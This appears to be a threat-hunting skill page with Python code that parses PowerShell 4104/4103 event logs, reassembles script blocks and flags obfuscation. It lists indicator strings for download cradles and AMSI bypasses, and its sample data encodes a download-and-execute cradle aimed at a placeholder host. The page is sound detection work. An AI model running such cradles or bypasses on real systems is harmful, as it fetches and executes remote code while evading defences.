Parses Windows PowerShell Script Block Logs (Event ID 4104, plus 4103 module logging) from EVTX files with python-evtx to reconstruct scripts and detect obfuscated commands, Base64-encoded payloads, download cradles, Invoke-Expression abuse, credential dumping, and AMSI bypasses, using entropy analysis and pattern matching for threat hunting.
Install: `npx claudepluginhub killvxk/cybersecurity-skills-zh`
1. Install dependencies: `pip install python-evtx lxml`
- Dependencies: `pip install python-evtx lxml`
- Input log: `Microsoft-Windows-PowerShell%4Operational.evtx`
- Encoded payload indicators: `-EncodedCommand`, `FromBase64String`
- Download cradle indicators: `DownloadString`, `DownloadFile`, `Invoke-WebRequest`, `Net.WebClient`
- AMSI bypass indicators: `AmsiUtils`, `amsiInitFailed`
- Run: `python scripts/agent.py --evtx-file /path/to/PowerShell-Operational.evtx --output ps_analysis.json`
```python
import base64

def decode_encoded_command(script_text):
    # -EncodedCommand payloads are Base64 of UTF-16LE text; this assumes the
    # payload is the last whitespace-separated token of the command line.
    if "-encodedcommand" in script_text.lower():
        encoded = script_text.split()[-1]
        return base64.b64decode(encoded).decode("utf-16-le")
    return None
```
A script split across several 4104 events shares one ScriptBlockId. Concatenate the chunks in MessageNumber order to recover the complete script.
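The reassembly step above, combined with the -EncodedCommand decoding and the indicator list from this page, as an added example that is not the skill's own code. It builds constructed 4104/4103 event XML inline (the XML shape and the `ScriptBlockId`/`MessageNumber`/`ScriptBlockText` field names are assumed to match what python-evtx's `record.xml()` returns), so it runs without an EVTX file; the sample IDs and URL are placeholders.

```python
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
INDICATORS = ["-EncodedCommand", "FromBase64String", "DownloadString", "DownloadFile",
              "Invoke-WebRequest", "Net.WebClient", "AmsiUtils", "amsiInitFailed"]
# Constructed sample (not real telemetry): two 4104 chunks of one script block, delivered out of
# order, plus a 4103 event to skip. XML shape as returned by python-evtx record.xml() (assumption).
_TMPL = ('<Event xmlns="{ns}"><System><EventID>{eid}</EventID></System><EventData>'
         '<Data Name="MessageNumber">{n}</Data><Data Name="ScriptBlockText">{txt}</Data>'
         '<Data Name="ScriptBlockId">{sbid}</Data></EventData></Event>')
_B64 = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16-le")).decode()
SBID = "11111111-2222-3333-4444-555555555555"
SAMPLE_EVENTS = [
    _TMPL.format(ns=NS["e"], eid=4104, n=2, txt=_B64, sbid=SBID),
    _TMPL.format(ns=NS["e"], eid=4103, n=1, txt="Get-Date", sbid="other"),
    _TMPL.format(ns=NS["e"], eid=4104, n=1, txt="powershell -NoProfile -EncodedCommand ", sbid=SBID),
]

def parse_4104(xml_text):
    # EventData fields of a 4104 event as a dict; None for any other EventID.
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4104":
        return None
    return {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}

def reassemble(xml_events):
    # Group chunks by ScriptBlockId and join them in MessageNumber order.
    chunks = defaultdict(list)
    for ev in filter(None, map(parse_4104, xml_events)):
        chunks[ev["ScriptBlockId"]].append((int(ev["MessageNumber"]), ev["ScriptBlockText"]))
    return {sbid: "".join(t for _, t in sorted(parts)) for sbid, parts in chunks.items()}

def decode_encoded_command(script):
    # Decode the UTF-16LE Base64 argument of -enc/-encodedcommand; None if absent or malformed.
    m = re.search(r"-enc[a-z]*\s+([A-Za-z0-9+/=]+)", script, re.I)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def hunt(xml_events):
    # Per ScriptBlockId: decoded payload (if any) and indicators hit in script text or payload.
    report = {}
    for sbid, script in reassemble(xml_events).items():
        decoded = decode_encoded_command(script)
        hay = (script + "\n" + (decoded or "")).lower()
        report[sbid] = {"decoded": decoded, "indicators": [i for i in INDICATORS if i.lower() in hay]}
    return report
```

With real data, feed `hunt()` the `record.xml()` strings from python-evtx; the cradle indicators here are only visible after the chunks are joined and the payload decoded.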